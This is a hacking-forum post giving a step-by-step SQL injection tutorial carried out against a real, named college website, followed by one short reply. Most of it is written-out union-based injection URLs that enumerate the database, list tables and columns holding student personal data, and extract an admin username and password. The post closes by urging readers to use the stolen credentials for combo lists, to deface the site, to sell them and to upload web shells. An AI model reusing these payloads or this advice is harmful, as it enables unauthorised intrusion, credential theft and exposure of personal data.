Sql Injection Tutorial

XeN4_H4xt0r

Honorable Member
Contributor
Member
Joined
May 5, 2013
Threads
237
Messages
654
Reaction score
408
Feedback: 0 / 0 / 0
What is SQLi ?
The Structured Query Language injection (SQLI) is the internal interface between an application and the Online Web Server.

Are you Confused because of lots of technical jargons?

I will make it simple. Basically a web hosting saves ALL its information in a table format known as Database. So all the usernames and password for accessing the webhosting will also be saved in the very same format. So SQLi is an interface where the user sends a query and the database gives an automated reply. So we will use this method to get the information about the admin's username and password, hence we get to access the complete web server.

Lets assume that our site is -



Now try to find some Url where a variable (a query) is passed :-

Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=22"]http://www.eastodissa.ac.in/news-and-events.php?id=22[/URL]
Now try to put an athrostrope (') to the end of URL to check wether it is vulnerable or not.

So, our URL is
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=22"]http://www.eastodissa.ac.in/news-and-events.php?id=22[/URL]'
After putting ' I have got an error that is "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1".Check that your victim site got any error like this or the page is same like before. If you have got the error then it means it is vulnerable although sometimes it's just an false-postitive

Now we are going to find that how many columns this website contains.
To check this we have to make the url nul and then put "order by 1--" after it and do it until we gets an error like this : Unknown column '8' in 'order clause'

Here is an example:

Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] order by 1--
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] order by 2--
If you have got an error in
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] order by 8--
then it means the site is having 7 columns thats why we have got an error in " order by 8-- ".
Now we are going to find a visible column.To find the visible column we have to use this "union select 1,2,3...--".The last number of "union select 1,2,3...--" should not be more than the total number of columns.So, our "union select 1,2,3...--" must be "union select 1,2,3,4,5,6,7--" because the site I am using in this tutorial contains 7 columns. So, the URL of the site I am attacking is
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] union select 1,2,3,4,5,6,7--
to get the visible column.
Now you will get the column number which is visible, The visible Column Will Always Be In The First Like this.

So, as you can see 2 is in the starting.It means our visible column is 2.

Now we're going to check the mysql version, database name.If you don't want to check these things you can skip steps. To check the mysql version we have to put "version()" in the place of the vulnerable column that is 2 for my victim site.
So the URL is
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] union select 1,version(),3,4,5,6,7--
.

Now you will get the mysql version.Like this one I have got :-

5.6.10
There is one thing common in these both pictures and the thing is the place of the visible column and the mysql version you have got.Both are on the same place but the visible column is exchanged with mysql version because we are finding the version.Everything will be shown in the place of visible column.

Now we're going to find the database name.Put "database()" in the place of version()or the vulnerable column number.and "from information_schema.schemata--" at the end of the url.So, my URL is this
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] union select 1,database(),3,4,5,6,7 from information_schema.schemata--
after going to the url I have got the DB name that is "nilakantatrust" in the place of that visible column.
Now this is step where everyone wants to come.In this step we're going to get table names.Its simple !
We are just going to put "group_concat(table_name)" and "from information_schema.tables where table_schema=database()--" at the end of the url.So, My URL is

Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
Now I have got these tables "est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineapplication,est_placementrecord"

Now we are going to find columns.Just put "group_concat(table_name)" in the place of vulnerable column or "group_concat(table_name)" and "from information_sceham.columns where table_name=database()--"
So my URL is
Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--
.
"

Code:
ach_id,ach_title,ach_detail,ach_type,ach_date,ach_status,ach_pdf,uid,userid,password,emailid,signature,last_login,uid,ipaddress,act_date,module,action,description,c_snum,c_name,c_photo,fac_snum,fac_name,fac_designation,fac_dept,fac_qualification,fac_email,fac_phone,fac_residence,fac_photo,fac_experience,fac_publication,fac_uid,fac_pwd,news_id,news_title,news_detail,news_type,news_date,news_status,news_pdf,notice_id,notice_title,notice_detail,notice_type,notice_date,notice_status,sno,trade,name,sex,dob,nri,laddress,paddress,email,pin,phone,mobile,caste,pname,prelation,poccupation,pincome,pphone,pmobile,pemail,lname,lrelation,loccupation,lincome,lphone,lmobile,lemail,marksheet,status,date,snum,sname,batch,branch,company,s_photo"
^ This is the column list I have got.

Now just extracting the username and pass from the database.As you can guess that "userid and password" column can be from est_admin.So, Now the last step is to put "group_concat(the column where username is,0x3a,Column where password is,0x3a)" and "from and your column name--" at the end of the URL.So, my url is

Code:
[URL="http://www.eastodissa.ac.in/news-and-events.php?id=-22"]http://www.eastodissa.ac.in/news-and-events.php?id=-22[/URL] union select 1,group_concat(userid,0x3a,password,0x3a),3,4,5,6,7 from est_admin--
where userid contains username and password contains password. and est_admin is the place where these two "userid" and "password" column must be.So, the userid and the password I have got is :- trustadmin:[email protected]!5!:
Now what is the use of this?

You can use these username:pass as your combo list, Sql injected a website only for combos?
You can use these username:pass to loginto admin panel and deface it.
You can sell it If anyone wants :P .
You can upload your shell and do your from those shells.
And more.

Thanks You Can Repute Me If This Really Helped.
 

xszcde

Banned
Banned
Member
Joined
Jul 1, 2013
Threads
0
Messages
106
Reaction score
0
Feedback: 0 / 0 / 0
Please note, if you want to make a deal with this user, that it is blocked.
thanks
 
Top